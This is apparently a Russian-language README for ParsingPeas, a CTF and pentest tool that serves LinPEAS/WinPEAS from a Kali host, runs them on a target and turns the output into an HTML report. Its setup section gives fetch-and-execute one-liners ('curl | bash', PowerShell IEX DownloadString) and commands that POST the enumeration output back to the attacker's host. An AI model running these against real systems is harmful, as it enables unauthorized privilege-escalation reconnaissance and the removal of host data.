
HTML-парсер для вывода PEAS с дополнительными функциями
Автоматизированный сбор PEASS + чистый, портативный HTML-отчёт для CTF и лабораторных работ по повышению привилегий.
Выполните одну команду на целевой системе. ParsingPeas загружает LinPEAS/WinPEAS с вашего Kali, запускает сканирование, пересылает результат обратно и превращает его в единый автономный HTML-отчёт, который можно читать, искать, анализировать и сохранять — без ручной передачи файлов и без интернета на целевой машине.
Сводка отчёта — разделы, сгруппированные по категориям LinPEAS, с точками находок и панелью находок:

Только находки — одним кликом фильтруется отчёт и боковая панель, показывая только разделы с критическими/высокими находками:

Полный вывод терминала — полное, с сохранением цветов сканирование; доступен поиск через Ctrl-F:

Сырой вывод PEASS — это стена прокручиваемого текста в терминале, которая исчезает, как только ваша оболочка умирает. ParsingPeas:
scp, размещения linpeas у себя, копирования вывода обратно в Kali..html-файл, который можно скопировать с машины, архивировать или открыть офлайн двойным щелчком.Это представление + логистика, а не движок эксплойтов: он точно сохраняет собственную расцветку и обозначения PEASS, а не гадает, что есть что.
file://.N критических / N высоких, позволяющие перепрыгивать между отмеченными разделами, плюс цветовая легенда.bash) и WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # загружает LinPEAS + WinPEAS в scripts/
pip3 install -r requirements.txt
python3 receiver.py # раздаёт на http://0.0.0.0:8005
Оставьте receiver.py работать. Узнайте IP, по которому целевая система сможет до вас достучаться:
tun0 — ip -4 addr show tun0Linux/Unix (использует curl, при неудаче — wget):
curl -sSL http://ВАШ_IP_KALI:8005/get-script | bash
Windows (PowerShell / реверс-шелл):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://ВАШ_IP_KALI:8005/get-script.ps1')"
Выберите команду в зависимости от ОС цели — Linux поставляет LinPEAS, Windows — WinPEAS.
Отчёты создаются на вашем Kali в папке ./reports/. Вы можете:
http://ВАШ_IP_KALI:8005 и щёлкнуть отчёт, илиxdg-open ./reports/report_<хост>_<время>.html
Скопируйте этот единственный .html-файл куда угодно; он работает сам по себе.
Цель → загружает обёртку с Kali → запускает PEASS → отправляет вывод методом POST → Kali разбирает → автономный HTML-отчёт
Целевой системе никогда не нужен интернет — обёртка и бинарники PEASS раздаются с вашего хоста.
Если однострочная команда не сработала, сделайте это вручную.
Linux:
# На целевой системе
curl http://IP_KALI:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Отправить обратно
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://IP_KALI:8005/upload
Windows (PowerShell):
Invoke-WebRequest -Uri http://IP_KALI:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://IP_KALI:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
Разобрать уже имеющийся дамп PEASS:
python3 parser.py /путь/к/peas_output.txt # создаёт HTML-отчёт в ./reports/
Отредактируйте начало receiver.py:
curl http://IP_KALI:8005/health, чтобы проверить связь; откройте фаервол sudo ufw allow 8005/tcp./get-linpeas? Выполните ./setup.sh, чтобы загрузить бинарники PEASS.⚠️ Только для авторизованного пентестинга, CTF и лабораторного использования.
Построено на PEASS-ng от @carlospolop. ParsingPeas только собирает и представляет его вывод.
Лицензия MIT · Вклады приветствуются
| Параметр | По умолчанию | Примечание |
|---|
| Порт | 8005 | измените строку app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | папка для загруженных сканов |
REPORTS_DIR | ./reports | папка для сгенерированных HTML-отчётов |
SCRIPTS_DIR | ./scripts | папка с бинарниками LinPEAS/WinPEAS |
MAX_UPLOAD_SIZE | 10 МБ | принудительно — загрузки большего размера получают HTTP 413 |